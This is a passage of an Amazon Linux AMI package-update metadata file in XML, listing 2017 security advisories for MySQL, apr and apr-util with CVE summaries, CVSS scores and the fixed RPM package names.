release="21.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.62-21.56.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.62" release="21.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.62-21.56.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.62" release="21.56.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.62-21.56.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-926</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-926: important priority package update for mysql56 mysql57</title><issued date="2017-12-05 21:50:00" /><updated date="2017-12-06 21:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10384:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.57 and earlier 5.6.37 and earlier 5.7.19 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1503686:
CVE-2017-10384 mysql: Server: DDL unspecified vulnerability (CPU Oct 2017)
CVE-2017-10379:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.0 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).
1503685:
CVE-2017-10379 mysql: Client programs unspecified vulnerability (CPU Oct 2017)
CVE-2017-10378:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.11 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1503684:
CVE-2017-10378 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2017)
CVE-2017-10314:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1503679:
CVE-2017-10314 mysql: Server: Memcached unspecified vulnerability (CPU Oct 2017)
CVE-2017-10294:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1503671:
CVE-2017-10294 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2017)
CVE-2017-10286:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: InnoDB). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1503669:
CVE-2017-10286 mysql: Server: InnoDB unspecified vulnerability (CPU Oct 2017)
CVE-2017-10283:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Performance Schema). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
1503664:
CVE-2017-10283 mysql: Server: Performance Schema unspecified vulnerability (CPU Oct 2017)
CVE-2017-10279:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1503663:
CVE-2017-10279 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2017)
CVE-2017-10276:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: FTS). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1503659:
CVE-2017-10276 mysql: Server: FTS unspecified vulnerability (CPU Oct 2017)
CVE-2017-10268:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.19 and earlier. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.0 Base Score 4.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N).
1503656:
CVE-2017-10268 mysql: Server: Replication unspecified vulnerability (CPU Oct 2017)
CVE-2017-10227:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1503654:
CVE-2017-10227 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2017)
CVE-2017-10155:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Pluggable Auth). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
1503649:
CVE-2017-10155 mysql: Server: Pluggable Auth unspecified vulnerability (CPU Oct 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10155" title="" id="CVE-2017-10155" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10227" title="" id="CVE-2017-10227" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10268" title="" id="CVE-2017-10268" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10276" title="" id="CVE-2017-10276" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10279" title="" id="CVE-2017-10279" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10283" title="" id="CVE-2017-10283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10286" title="" id="CVE-2017-10286" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10294" title="" id="CVE-2017-10294" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10314" title="" id="CVE-2017-10314" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10378" title="" id="CVE-2017-10378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10379" title="" id="CVE-2017-10379" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10384" title="" id="CVE-2017-10384" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-bench" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.38" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.38-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.38" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.38-1.27.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.20" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.20-2.5.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.20-2.5.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.20" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.20-2.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-927</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-927: medium priority package update for mysql55</title><issued date="2017-12-05 21:54:00" /><updated date="2017-12-06 21:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10384:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.57 and earlier 5.6.37 and earlier 5.7.19 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1503686:
CVE-2017-10384 mysql: Server: DDL unspecified vulnerability (CPU Oct 2017)
CVE-2017-10379:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.19 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.0 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).
1503685:
CVE-2017-10379 mysql: Client programs unspecified vulnerability (CPU Oct 2017)
CVE-2017-10378:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.11 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1503684:
CVE-2017-10378 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2017)
CVE-2017-10268:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.5.57 and earlier, 5.6.37 and earlier and 5.7.19 and earlier. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.0 Base Score 4.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N).
1503656:
CVE-2017-10268 mysql: Server: Replication unspecified vulnerability (CPU Oct 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10268" title="" id="CVE-2017-10268" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10378" title="" id="CVE-2017-10378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10379" title="" id="CVE-2017-10379" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10384" title="" id="CVE-2017-10384" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-test" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.58" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.58-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.58-1.19.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.58" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.58-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-928</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-928: important priority package update for apr</title><issued date="2017-12-05 21:57:00" /><updated date="2017-12-06 21:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12613:
An out-of-bounds array dereference was found in apr_time_exp_get(). An attacker could abuse an unvalidated usage of this function to cause a denial of service or potentially lead to data leak.
1506523:
CVE-2017-12613 apr: Out-of-bounds array deref in apr_time_exp*() functions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12613" title="" id="CVE-2017-12613" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apr-devel" version="1.5.2" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-devel-1.5.2-5.13.amzn1.x86_64.rpm</filename></package><package name="apr-debuginfo" version="1.5.2" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-debuginfo-1.5.2-5.13.amzn1.x86_64.rpm</filename></package><package name="apr" version="1.5.2" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-1.5.2-5.13.amzn1.x86_64.rpm</filename></package><package name="apr-devel" version="1.5.2" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/apr-devel-1.5.2-5.13.amzn1.i686.rpm</filename></package><package name="apr" version="1.5.2" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/apr-1.5.2-5.13.amzn1.i686.rpm</filename></package><package name="apr-debuginfo" version="1.5.2" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/apr-debuginfo-1.5.2-5.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-929</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-929: medium priority package update for apr-util</title><issued date="2017-12-05 21:59:00" /><updated date="2017-12-06 21:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12618:
Apache Portable Runtime Utility (APR-util) 1.6.0 and prior fail to validate the integrity of SDBM database files used by apr_sdbm*() functions, resulting in a possible out of bound read access. A local user with write access to the database can make a program or process using these functions crash, and cause a denial of service.
1506532:
CVE-2017-12618 apr-util: Out-of-bounds access in corrupted SDBM database
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12618" title="" id="CVE-2017-12618" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apr-util-sqlite" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-sqlite-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-mysql" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-mysql-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-odbc" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-odbc-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-openssl" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-openssl-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-ldap" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-ldap-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-devel" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-devel-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-pgsql" version="1.5.4" release="6.18.amzn1" epoch="0" 